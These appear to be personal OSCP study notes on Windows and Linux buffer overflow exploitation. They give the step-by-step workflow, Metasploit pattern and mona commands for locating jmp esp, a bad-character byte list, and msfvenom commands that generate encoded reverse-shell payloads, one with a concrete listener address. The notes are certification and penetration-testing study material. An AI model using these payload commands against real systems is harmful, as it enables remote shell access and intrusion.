Omar2535

# Buffer overflows

  1. Search for buffer overflow vunlerability by determining at what length does the program crash
  2. Search for where instruction pointer is overwritten by generating non-repeating payload then finding the offset at which eip is overwritten
  3. Find the bad characters by using all the possible hex values and looking at the stack to see which characters didn't make it through
  4. Find which register points to somewhere in the stack where we can write to
  5. Find an instruction that jumps to the register ie. jmp esp
  6. Get that instructions address and overwrite eip with that
  7. Use the register's location and put our shell code there

# Create pattern

msf-pattern_create -l <length>

# Pattern offset finder

msf-pattern_offset -q <pattern_found>

# Generate assembly instruction opcodes

msf-nasm_shell
nasm > add eax,12
00000000  83C00C            add eax,byte +0xc

# Mona finding jmp esp

First find one where everything is false like ASLR and such:

!mona modules

once the .dll or .exe is found, we can use mona to find the command:

!mona find -s '\xff\xe4' -m pprogramname.exe

!mona jmp -r esp
# click view > log or press alt + L

or

!mona find -s '\xff\xe4'

Remember to send the address in little endian

# Bad characters

Be aware that if a buffer overflow is strict on length, then some bad characters that don't make it through will result in the buffer overflow crash not being triggered.

The following is missing \x00,\x1A,\x1D

badchars = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# Shell payloads

# Shikata ga nai

msfvenom -p windows/shell_reverse_tcp LHOST=<listening_host> LPORT=<listening_port> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b <illegal characters as string ie. "\x00\x12...">

# Fnstenv mov

msfvenom -p windows/shell_reverse_tcp LHOST=<listening host> LPORT=<listening port> -f c -e x86/fnstenv_mov -b "\x00\x0a\x0d\xff\x3b\x45..."

# Linux reverse tcp shells

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.194 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b <illegal characters as string ie. "\x00\x12...">

OSCP Notes